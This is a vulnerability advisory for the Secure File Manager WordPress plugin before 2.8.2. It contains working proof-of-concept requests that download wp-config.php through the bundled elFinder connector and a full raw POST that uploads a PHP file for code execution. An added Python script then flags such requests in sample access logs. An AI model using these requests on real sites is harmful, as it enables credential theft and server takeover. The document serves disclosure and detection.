WPEX-ID: 47C1639F-4558-4CB6-8F50-E5E8564663C2 (wpexploit, source: Wpvulndb)
Published: Nov 23, 2020

Secure File Manager < 2.8.2 - Authenticated Remote Command Execution


EPSS: 0.005 (Low), percentile 76.6%

The Secure File Manager plugin uses the elFinder libraries in an insecure way, allowing authenticated users to execute arbitrary file management commands. Version 2.6 attempted to fix the issue by adding a CSRF nonce; however, the nonce is displayed to all users in the Dashboard via the Secure File Manager menu (even though the page shows an Unauthorized Access error for non-admin users).

Download the wp-config.php

< 2.6 - As an unauthenticated user, open /wp-content/plugins/secure-file-manager/vendor/elfinder/php/connector.minimal.php?cmd=file&target=l1_d3AtY29uZmlnLnBocA&download=1&cpath=/wp-admin/admin.php

< 2.8.2 - Log in as any user and access the Secure File Manager menu (wp-admin/admin.php?page=sfm_file_manager), which will result in an Unauthorized Access error unless logged in as admin. View the source of the page and retrieve the value of sfmpNonceKey, then append it to the URL above in a _wpnonce parameter:

/wp-content/plugins/secure-file-manager/vendor/elfinder/php/connector.minimal.php?cmd=file&target=l1_d3AtY29uZmlnLnBocA&download=1&_wpnonce=69f62e1414&cpath=/wp-admin/admin.php


RCE can be obtained as well, with a crafted request to upload a PHP file, e.g. /hello-user.php:

for < 2.8.2, get the nonce with the same technique as above
for < 2.6, just remove the _wpnonce parameter

POST /wp-content/plugins/secure-file-manager/vendor/elfinder/php/connector.minimal.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:84.0) Gecko/20100101 Firefox/84.0
Accept: */*
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1/wp-admin/admin.php?page=sfm_file_manager
Content-Type: multipart/form-data; boundary=---------------------------32138351926630035821198693946
Content-Length: 851
Origin: http://127.0.0.1
Connection: close
Cookie: [Subscriber cookie]

-----------------------------32138351926630035821198693946
Content-Disposition: form-data; name="reqid"

1770034af3e3c9
-----------------------------32138351926630035821198693946
Content-Disposition: form-data; name="cmd"

upload
-----------------------------32138351926630035821198693946
Content-Disposition: form-data; name="target"

l1_Lw
-----------------------------32138351926630035821198693946
Content-Disposition: form-data; name="_wpnonce"

69f62e1414
-----------------------------32138351926630035821198693946
Content-Disposition: form-data; name="upload[]"; filename="hello-user.php"
Content-Type: text/plain

<?php echo 'failed'; ?>

-----------------------------32138351926630035821198693946
Content-Disposition: form-data; name="mtime[]"

1375102826
-----------------------------32138351926630035821198693946--
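Both proofs of concept above leave a recognisable trace in the web server access log: a request to the plugin's bundled elFinder connector with a cmd parameter and an opaque target hash. The following added example (not part of the WPScan entry or the plugin's code) decodes those hashes and flags connector traffic in a handful of constructed "combined"-format log lines so a responder can see which file was fetched or which directory an upload went to. It assumes elFinder's default target encoding (volume id, an underscore, then base64 of the path relative to the volume root with +/= rewritten to -_. and trailing dots stripped); a deployment with a custom crypt() would not decode this way.

```python
from __future__ import annotations

import base64
import posixpath
import re
from urllib.parse import parse_qs, urlsplit

# Connector path taken from the advisory above.
CONNECTOR_PATH = (
    "/wp-content/plugins/secure-file-manager/vendor/elfinder/php/connector.minimal.php"
)
# Files whose download through the connector should always be treated as an incident.
SENSITIVE_FILES = {"wp-config.php", ".htaccess", ".env"}

# Constructed sample log lines (Apache/nginx "combined" format). They are not from a
# real server; they only mirror the request shapes shown in the advisory.
SAMPLE_LOG = """\
203.0.113.5 - - [23/Nov/2020:10:01:12 +0000] "GET /wp-content/plugins/secure-file-manager/vendor/elfinder/php/connector.minimal.php?cmd=file&target=l1_d3AtY29uZmlnLnBocA&download=1&_wpnonce=69f62e1414&cpath=/wp-admin/admin.php HTTP/1.1" 200 3120 "-" "Mozilla/5.0"
203.0.113.5 - - [23/Nov/2020:10:01:40 +0000] "POST /wp-content/plugins/secure-file-manager/vendor/elfinder/php/connector.minimal.php HTTP/1.1" 200 187 "http://127.0.0.1/wp-admin/admin.php?page=sfm_file_manager" "Mozilla/5.0"
198.51.100.7 - - [23/Nov/2020:10:02:03 +0000] "GET /wp-content/plugins/secure-file-manager/vendor/elfinder/php/connector.minimal.php?cmd=open&target=l1_Lw&init=1 HTTP/1.1" 200 902 "-" "Mozilla/5.0"
198.51.100.9 - - [23/Nov/2020:10:03:11 +0000] "GET /wp-login.php HTTP/1.1" 200 4011 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<url>\S+) [^"]*" (?P<status>\d{3})'
)


def decode_elfinder_target(target: str) -> tuple[str, str]:
    """Turn an elFinder hash such as 'l1_d3AtY29uZmlnLnBocA' into (volume_id, path).

    Assumed encoding (elFinder's default): '<volume id>_' + base64(path relative to
    the volume root) with '+/=' rewritten to '-_.' and trailing '.' stripped; the
    root itself is encoded as '/'. The first underscore separates the volume id, so
    underscores inside the base64 part (encoded '/') are left alone.
    """
    volume, sep, encoded = target.partition("_")
    if not sep:
        return ("", "")
    encoded = encoded.replace(".", "=")
    encoded += "=" * (-len(encoded) % 4)  # restore the stripped base64 padding
    try:
        path = base64.urlsafe_b64decode(encoded).decode("utf-8")
    except (ValueError, UnicodeDecodeError):
        return (volume, "<undecodable>")
    return (volume, path)


def analyse_log(text: str) -> list[dict]:
    """Return one finding per logged request that reached the elFinder connector."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        parts = urlsplit(m["url"])
        if parts.path != CONNECTOR_PATH:
            continue  # unrelated request
        query = parse_qs(parts.query)
        cmd = query.get("cmd", [""])[0]
        _, path = decode_elfinder_target(query.get("target", [""])[0])

        is_post = m["method"] == "POST"
        is_download = cmd == "file" and query.get("download", [""])[0] == "1"
        is_sensitive = posixpath.basename(path) in SENSITIVE_FILES

        reasons = []
        if is_post:
            # upload/mkfile/rm travel in the POST body, which the access log omits.
            reasons.append("POST to connector: body command not logged, check WAF/app logs")
        if is_download:
            reasons.append(f"file download via connector: {path}")
        if is_sensitive:
            reasons.append(f"sensitive file targeted: {path}")
        if not reasons:
            reasons.append(f"elFinder command '{cmd}' on '{path}'")

        findings.append({
            "ip": m["ip"], "time": m["ts"], "method": m["method"],
            "status": m["status"], "cmd": cmd, "path": path,
            "severity": "high" if (is_post or is_download or is_sensitive) else "info",
            "reasons": reasons,
        })
    return findings


if __name__ == "__main__":
    for f in analyse_log(SAMPLE_LOG):
        print(f"[{f['severity']}] {f['ip']} {f['method']} cmd={f['cmd'] or '-'} path={f['path'] or '-'}")
        for r in f["reasons"]:
            print("    -", r)
```

The access log alone cannot distinguish an admin's legitimate connector use from the PoC, and a POST shows neither cmd nor filename, so treat this as triage input: correlate the source IP with the WordPress session that issued the request and look for newly created .php files under the upload target. The durable fix is upgrading the plugin to 2.8.2 or later; until then, blocking direct requests to the connector path at the web server removes both the download and the upload vector.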

